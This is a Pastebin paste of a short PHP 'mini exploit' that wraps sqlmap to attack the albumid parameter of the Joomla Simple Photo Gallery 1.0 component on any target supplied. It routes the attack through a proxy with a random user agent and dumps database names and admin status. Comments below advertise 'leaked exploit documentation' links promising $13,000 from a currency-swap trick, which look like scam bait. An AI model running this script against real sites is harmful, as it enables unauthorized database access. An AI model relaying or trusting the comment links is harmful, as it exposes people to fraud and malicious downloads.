Googleinurl

[MINI EXPLOIT] Joomla Simple Photo Gallery 1.0 - SQLI

Mar 16th, 2015
18,107
0
Never
4
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.01 KB | None | 0 0
  1. <?php
  2. # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  3. # Blog:          http://blog.inurl.com.br
  4. # Twitter:       https://twitter.com/googleinurl
  5. # Fanpage:       https://fb.com/InurlBrasil
  6. # Pastebin       http://pastebin.com/u/Googleinurl
  7. # GIT:           https://github.com/googleinurl
  8. # PSS:           http://packetstormsecurity.com/user/googleinurl/
  9. # YOUTUBE        https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
  10. # REF:           http://www.exploit-db.com/exploits/36385/
  11. set_time_limit(0);
  12. echo "[+]  MINI exploit-SQLMAP / Joomla Simple Photo Gallery 1.0 - SQL injection\n";
  13. $target = isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}")  : exit("\n0x[ERRO] DEFINE TARGET!\n");
  14. $command = "sqlmap -u '{$target}/index.php?option=com_simplephotogallery&view=images&albumid=1' -p albumid --batch --dbms=MySQL --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --eta --answers='follow=N' --dbs --is-dba";
  15. system($command, $dados).empty($dados[0]) ? exit() : NULL;
Advertisement
Comments
  • nasser5454
    6 days
    # CSS 0.85 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without any verification from Swapzone — instant swap).
  • cdujr08
    5 days
    # CSS 0.78 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://rawtext.host/raw?44lh4m
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without any verification from Swapzone — instant swap).
  • User was banned
  • rvthrilling
    4 days
    # CSS 0.05 KB | 0 0
    1. You literally stole it from https://t.me/theprotocolone
Add Comment
Please, Sign In to add comment